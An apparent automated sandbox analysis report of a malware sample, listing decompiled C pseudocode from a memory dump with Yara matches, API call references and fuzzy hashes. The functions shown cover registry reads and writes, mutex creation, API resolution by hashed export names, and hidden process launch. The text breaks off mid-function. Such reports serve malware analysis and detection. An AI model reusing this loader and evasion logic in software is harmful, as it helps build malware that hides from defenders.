                                                                                                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,00AF2BFB,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 00AFC027
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1586453840-0
                                                                                                                                                                                                • Opcode ID: 98b1ed7947cf01eabc291f3b781c067dcd1f7353121b8cc7970538f9ff9f989a
                                                                                                                                                                                                • Instruction ID: 00ca5bbfc78460dc70628ffe74f7f727f11d9df396a7982fdca504bfaa23182c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 98b1ed7947cf01eabc291f3b781c067dcd1f7353121b8cc7970538f9ff9f989a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 76211A7590010CFFDB10DBEADD04DAEBBB8EB98750B1141A5B611E7121DB31DA01EB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFBEDD(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                				int _v16;
                                                                                                                                                                                                				char* _t34;
                                                                                                                                                                                                				intOrPtr* _t43;
                                                                                                                                                                                                				char* _t46;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t46 = 0;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
                                                                                                                                                                                                					_t34 = E00AF85E5(_v12 + 1); // executed
                                                                                                                                                                                                					_t46 = _t34;
                                                                                                                                                                                                					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
                                                                                                                                                                                                						_t43 = _a12;
                                                                                                                                                                                                						if(_t43 != 0) {
                                                                                                                                                                                                							 *_t43 = _v12;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                                                                					RegCloseKey(_v8);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t46;
                                                                                                                                                                                                			}










                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00020019,?,04D3F9F0,00000000,?,00000002), ref: 00AFBF00
                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 00AFBF23
                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 00AFBF50
                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,00000002), ref: 00AFBF70
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1586453840-0
                                                                                                                                                                                                • Opcode ID: bd9920b8d21ba8b972dd536e7e006c246828bf5ddaaa70a92d18e9ce8677d482
                                                                                                                                                                                                • Instruction ID: a05db8e912c150dc24cae477d08bbeb895caa54c81e384e205820a56be5edf66
                                                                                                                                                                                                • Opcode Fuzzy Hash: bd9920b8d21ba8b972dd536e7e006c246828bf5ddaaa70a92d18e9ce8677d482
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C21B7B5A00108BFDB10DFA9DD84EAEBBB9EF98740B1141A9B915D7120D731DA40DBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                			E00AF5624(void* __edx, void* __edi) {
                                                                                                                                                                                                				char _v44;
                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                				intOrPtr _t11;
                                                                                                                                                                                                				intOrPtr _t14;
                                                                                                                                                                                                				intOrPtr _t17;
                                                                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t54 = __edi;
                                                                                                                                                                                                				_t8 = E00AF9E47(0x3b); // executed
                                                                                                                                                                                                				if(_t8 != 0xffffffff) {
                                                                                                                                                                                                					L2:
                                                                                                                                                                                                					E00AF97ED(0xb0e6c8);
                                                                                                                                                                                                					_t39 = 0x37; // executed
                                                                                                                                                                                                					E00AF9ED1(_t39);
                                                                                                                                                                                                					_t11 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                					_t40 = 0x3a; // executed
                                                                                                                                                                                                					E00AF9ED1(_t40); // executed
                                                                                                                                                                                                					E00AFE503(_t63);
                                                                                                                                                                                                					_t14 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                					_t41 =  &_v44;
                                                                                                                                                                                                					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
                                                                                                                                                                                                					E00AFA8AF( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
                                                                                                                                                                                                					_t17 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0xb0e6c8,  *0xb0e6cc);
                                                                                                                                                                                                					 *0xb0e74c = _t18;
                                                                                                                                                                                                					if(_t18 != 0) {
                                                                                                                                                                                                						_t20 = CreateMutexA(0, 0, 0);
                                                                                                                                                                                                						 *0xb0e76c = _t20;
                                                                                                                                                                                                						__eflags = _t20;
                                                                                                                                                                                                						if(_t20 != 0) {
                                                                                                                                                                                                							_t34 = E00AF85E5(0x1000);
                                                                                                                                                                                                							_t52 = 0;
                                                                                                                                                                                                							 *0xb0e770 = _t34;
                                                                                                                                                                                                							_t49 =  *0xb0e774; // 0x2
                                                                                                                                                                                                							__eflags = _t34;
                                                                                                                                                                                                							_t41 =  !=  ? 0 : _t49;
                                                                                                                                                                                                							__eflags = _t41;
                                                                                                                                                                                                							 *0xb0e774 = _t41; // executed
                                                                                                                                                                                                						}
                                                                                                                                                                                                						E00AF1521(_t41, _t52); // executed
                                                                                                                                                                                                						E00AF98CF(E00AF2ECD, 0, __eflags, 0, 0); // executed
                                                                                                                                                                                                						E00AF300A(); // executed
                                                                                                                                                                                                						E00AF31B5(0, __eflags); // executed
                                                                                                                                                                                                						E00AF299A(); // executed
                                                                                                                                                                                                						E00AF3BA5(_t54, __eflags); // executed
                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                							__eflags =  *0xb0e758; // 0x0
                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                								break;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							E00AF97ED(0xb0e750);
                                                                                                                                                                                                							_push(0xb0e750);
                                                                                                                                                                                                							_push(0xb0e750); // executed
                                                                                                                                                                                                							E00AF2784();
                                                                                                                                                                                                							Sleep(0xfa0);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						E00AF3D27();
                                                                                                                                                                                                						E00AF9A6F();
                                                                                                                                                                                                						E00AF34BE();
                                                                                                                                                                                                						_t33 = 0;
                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t36 = E00AF2DBE();
                                                                                                                                                                                                					_t63 = _t36;
                                                                                                                                                                                                					if(_t36 != 0) {
                                                                                                                                                                                                						L3:
                                                                                                                                                                                                						_t33 = 1;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						goto L2;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t33;
                                                                                                                                                                                                			}

















                                                                                                                                                                                                0x00af5760

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00AF56C3
                                                                                                                                                                                                  • Part of subcall function 00AF97ED: GetSystemTimeAsFileTime.KERNEL32(?,?,00AF5F90), ref: 00AF97FA
                                                                                                                                                                                                  • Part of subcall function 00AF97ED: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF981A
                                                                                                                                                                                                • Sleep.KERNELBASE(00000FA0), ref: 00AF573D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                • String ID: C]Ua
                                                                                                                                                                                                • API String ID: 3249252070-838364659
                                                                                                                                                                                                • Opcode ID: 402aa4d15d341cd366357c76ebf3894eb13fb534a95a7e606a606c58ee3766d5
                                                                                                                                                                                                • Instruction ID: 86e0b956e733d85f97b540f695faf17b38647fa59826e70cb7c5ad797afad859
                                                                                                                                                                                                • Opcode Fuzzy Hash: 402aa4d15d341cd366357c76ebf3894eb13fb534a95a7e606a606c58ee3766d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D31F9326056099BE724B7F5AE06F7B3B98DF25350B004925F328871A2EF71C900C7A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFDFEF(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                				signed int _t47;
                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                				struct HINSTANCE__* _t58;
                                                                                                                                                                                                				_Unknown_base(*)()* _t59;
                                                                                                                                                                                                				intOrPtr _t60;
                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                				intOrPtr _t63;
                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                				char _t70;
                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                				CHAR* _t80;
                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t75 = __ecx;
                                                                                                                                                                                                				_v12 = __edx;
                                                                                                                                                                                                				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                                                                                				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                                                                                                                                                				if(_t41 == 0) {
                                                                                                                                                                                                					L4:
                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t62 = _t41 + __ecx;
                                                                                                                                                                                                				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                                                                                                                                                				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                                				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                                                                                                                                                				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                                                                                                                                                				_t47 = 0;
                                                                                                                                                                                                				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				_v16 = _t63;
                                                                                                                                                                                                				if(_t63 == 0) {
                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					goto L2;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                					L2:
                                                                                                                                                                                                					_t49 = E00AFD442( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E00AFC3BB( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                                                					_t51 = _v8;
                                                                                                                                                                                                					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                                                                                                                                                						break;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t73 = _v20;
                                                                                                                                                                                                					_t47 = _t51 + 1;
                                                                                                                                                                                                					_v8 = _t47;
                                                                                                                                                                                                					if(_t47 < _v16) {
                                                                                                                                                                                                						continue;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                                                				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                                                				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                                                                                                                                                					return _t80;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t56 = 0;
                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                						_t70 = _t80[_t56];
                                                                                                                                                                                                						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                                                						_t56 = _t56 + 1;
                                                                                                                                                                                                						if(_t56 < 0x40) {
                                                                                                                                                                                                							continue;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						break;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                                                                                                                                                					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                                                                                                                                                					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                                                						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                                                					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                                                					if(_t58 == 0) {
                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                                                					if(_t59 == 0) {
                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					return _t59;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}

























                                                                                                                                                                                                0x00afe05b
                                                                                                                                                                                                0x00afe061
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe061
                                                                                                                                                                                                0x00afe078
                                                                                                                                                                                                0x00afe07d
                                                                                                                                                                                                0x00afe081
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe08d
                                                                                                                                                                                                0x00afe08d
                                                                                                                                                                                                0x00afe08f
                                                                                                                                                                                                0x00afe08f
                                                                                                                                                                                                0x00afe095
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe09b
                                                                                                                                                                                                0x00afe09f
                                                                                                                                                                                                0x00afe0a3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe0a3
                                                                                                                                                                                                0x00afe0a9
                                                                                                                                                                                                0x00afe0b1
                                                                                                                                                                                                0x00afe0b6
                                                                                                                                                                                                0x00afe0b9
                                                                                                                                                                                                0x00afe0b9
                                                                                                                                                                                                0x00afe0bb
                                                                                                                                                                                                0x00afe0bf
                                                                                                                                                                                                0x00afe0c7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe0cb
                                                                                                                                                                                                0x00afe0d3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe0d3

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(.dll,00AF604E,0000011C,00000000), ref: 00AFE0BF
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 00AFE0CB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                • String ID: .dll
                                                                                                                                                                                                • API String ID: 2574300362-2738580789
                                                                                                                                                                                                • Opcode ID: 23b3371288b1dfdebfc6bfba4e921f62e5ebb9ef3d09a479109768d890a6e73a
                                                                                                                                                                                                • Instruction ID: 1ef2e71473db183d5a50ecfd21d3d5a2f78a6b1e03690d1d5463bc82dff8ef10
                                                                                                                                                                                                • Opcode Fuzzy Hash: 23b3371288b1dfdebfc6bfba4e921f62e5ebb9ef3d09a479109768d890a6e73a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A318D71A0015D9BCB24CFA9C880BBEBBF5AF45304F284479EA45E7361DFB0D9518B90
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                			E00AFA076(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
                                                                                                                                                                                                				char* _v12;
                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                				int _v20;
                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                				char* _v32;
                                                                                                                                                                                                				char _v52;
                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                				char _v328;
                                                                                                                                                                                                				char _v2832;
                                                                                                                                                                                                				signed int _t48;
                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                				char* _t54;
                                                                                                                                                                                                				long _t73;
                                                                                                                                                                                                				long _t80;
                                                                                                                                                                                                				long _t83;
                                                                                                                                                                                                				void* _t88;
                                                                                                                                                                                                				char* _t89;
                                                                                                                                                                                                				intOrPtr _t90;
                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                				void* _t104;
                                                                                                                                                                                                				char* _t106;
                                                                                                                                                                                                				intOrPtr _t107;
                                                                                                                                                                                                				char _t108;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t48 = __ecx;
                                                                                                                                                                                                				_t89 = __edx;
                                                                                                                                                                                                				_v24 = __ecx;
                                                                                                                                                                                                				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                					L13:
                                                                                                                                                                                                					_t49 = _t48 | 0xffffffff;
                                                                                                                                                                                                					__eflags = _t49;
                                                                                                                                                                                                					return _t49;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t115 = __edx;
                                                                                                                                                                                                					if(__edx == 0) {
                                                                                                                                                                                                						goto L13;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t107 =  *((intOrPtr*)(__ecx + 0x108));
                                                                                                                                                                                                					_push(_t107);
                                                                                                                                                                                                					_t103 = 4;
                                                                                                                                                                                                					_v12 = __edx;
                                                                                                                                                                                                					_v28 = E00AFD442( &_v12, _t103);
                                                                                                                                                                                                					_t93 = _t107 + __edx;
                                                                                                                                                                                                					E00B02339(_t107 + __edx,  &_v2832);
                                                                                                                                                                                                					_t54 = E00B02465(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
                                                                                                                                                                                                					_t108 = _a8;
                                                                                                                                                                                                					_v12 = _t54;
                                                                                                                                                                                                					_v20 = _t54 + 6 + _t108;
                                                                                                                                                                                                					_t106 = E00AF85E5(_t54 + 6 + _t108);
                                                                                                                                                                                                					_v32 = _t106;
                                                                                                                                                                                                					if(_t106 != 0) {
                                                                                                                                                                                                						 *_t106 = _a12;
                                                                                                                                                                                                						_t16 =  &(_t106[6]); // 0x6
                                                                                                                                                                                                						_t106[1] = 1;
                                                                                                                                                                                                						_t106[2] = _t108;
                                                                                                                                                                                                						E00AF86C2(_t16, _a4, _t108);
                                                                                                                                                                                                						_t21 = _t108 + 6; // 0x6
                                                                                                                                                                                                						E00B0230B( &_v2832, _t21 + _t106, _v12);
                                                                                                                                                                                                						_v16 = _t89;
                                                                                                                                                                                                						_t90 = _v24;
                                                                                                                                                                                                						_v12 =  *((intOrPtr*)(_t90 + 0x108));
                                                                                                                                                                                                						_push( &_v52);
                                                                                                                                                                                                						_t104 = 8;
                                                                                                                                                                                                						E00AFF4D2( &_v16, _t104);
                                                                                                                                                                                                						E00AFEB03( &_v16,  &_v52, 0x14,  &_v328);
                                                                                                                                                                                                						E00AFEB70(_t106, _v20,  &_v328);
                                                                                                                                                                                                						_t73 = E00AF9AEF(_t90);
                                                                                                                                                                                                						_v12 = _t73;
                                                                                                                                                                                                						__eflags = _t73;
                                                                                                                                                                                                						if(_t73 != 0) {
                                                                                                                                                                                                							E00AF9781(_v28,  &_v64, 0x10);
                                                                                                                                                                                                							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
                                                                                                                                                                                                							__eflags = _t80;
                                                                                                                                                                                                							if(_t80 == 0) {
                                                                                                                                                                                                								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
                                                                                                                                                                                                								__eflags = _t83;
                                                                                                                                                                                                								if(_t83 != 0) {
                                                                                                                                                                                                									_push(0xfffffffc);
                                                                                                                                                                                                									_pop(0);
                                                                                                                                                                                                								}
                                                                                                                                                                                                								RegCloseKey(_a4);
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_push(0xfffffffd);
                                                                                                                                                                                                								_pop(0);
                                                                                                                                                                                                							}
                                                                                                                                                                                                							E00AF85FB( &_v12, 0xffffffff);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						E00AF85FB( &_v32, 0);
                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t88 = 0xfffffffe;
                                                                                                                                                                                                					return _t88;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}




























                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00B02465: _ftol2_sse.MSVCRT ref: 00B024C6
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000002,00000000), ref: 00AFA1A9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeapOpen_ftol2_sse
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3756893521-0
                                                                                                                                                                                                • Opcode ID: 1d392aade176a6e5cae46877d1b51f2b35084c8d029b4bd4ec1925fbf0afaeef
                                                                                                                                                                                                • Instruction ID: 3eb398c865b2084fde3833aa29d68f0a314be19911510c1ac9ee2c4d9cb38fca
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d392aade176a6e5cae46877d1b51f2b35084c8d029b4bd4ec1925fbf0afaeef
                                                                                                                                                                                                • Instruction Fuzzy Hash: AF516F7290021DABCF11DFE4DC85FEEBBB8AF14320F108266F619A7191EB749645CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 66%
                                                                                                                                                                                                			E00AFA953(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                                                                                				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                                                                				struct _STARTUPINFOW _v92;
                                                                                                                                                                                                				signed int _t24;
                                                                                                                                                                                                				intOrPtr _t30;
                                                                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                				int _t42;
                                                                                                                                                                                                				WCHAR* _t44;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t42 = 0x44;
                                                                                                                                                                                                				memset( &_v92, 0, _t42);
                                                                                                                                                                                                				_v92.cb = _t42;
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				_t44 = 1;
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				_t24 = _a16;
                                                                                                                                                                                                				if(_t24 != 0) {
                                                                                                                                                                                                					_v92.dwFlags = 1;
                                                                                                                                                                                                					_v92.wShowWindow = 0;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				asm("sbb eax, eax");
                                                                                                                                                                                                				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
                                                                                                                                                                                                					_t44 = 0;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					if(_a8 != 0) {
                                                                                                                                                                                                						_push(_a12);
                                                                                                                                                                                                						_t34 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						_push(_v20.hProcess);
                                                                                                                                                                                                						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
                                                                                                                                                                                                							GetExitCodeProcess(_v20.hProcess, _a8);
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t30 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
                                                                                                                                                                                                					_t32 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					 *((intOrPtr*)(_t32 + 0x30))(_v20);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t44;
                                                                                                                                                                                                			}

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFA967
                                                                                                                                                                                                • CreateProcessW.KERNELBASE(00000000,00001388,00000000,00000000,00000000,00AFC1ED,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 00AFA9AE
                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32 ref: 00AFA9D2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process$CodeCreateExitmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4170947310-0
                                                                                                                                                                                                • Opcode ID: ce296b5f41538a203e8b69dfab5ef8ac7c5c64d4b63853aa478a59b1fc2ec48e
                                                                                                                                                                                                • Instruction ID: 2b4b0c1771cc2f3bf1e8ff375341a478f8e9f403c610d0e94fc6f64485efd2a6
                                                                                                                                                                                                • Opcode Fuzzy Hash: ce296b5f41538a203e8b69dfab5ef8ac7c5c64d4b63853aa478a59b1fc2ec48e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E2147B2A10119AFDB419FE9DC84EEEBBBCFB28344B014525FA25E6161DA71DC40CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                			E00AFB9DA(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                
                                                                                                                                                                                                				_push(_t22);
                                                                                                                                                                                                				_push(_t22);
                                                                                                                                                                                                				_t31 = 0;
                                                                                                                                                                                                				_t28 = __edx;
                                                                                                                                                                                                				_t20 = _t22;
                                                                                                                                                                                                				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                					L6:
                                                                                                                                                                                                					_t12 = _t31;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t31 = E00AF85E5(_v8);
                                                                                                                                                                                                					_v12 = _t31;
                                                                                                                                                                                                					if(_t31 != 0) {
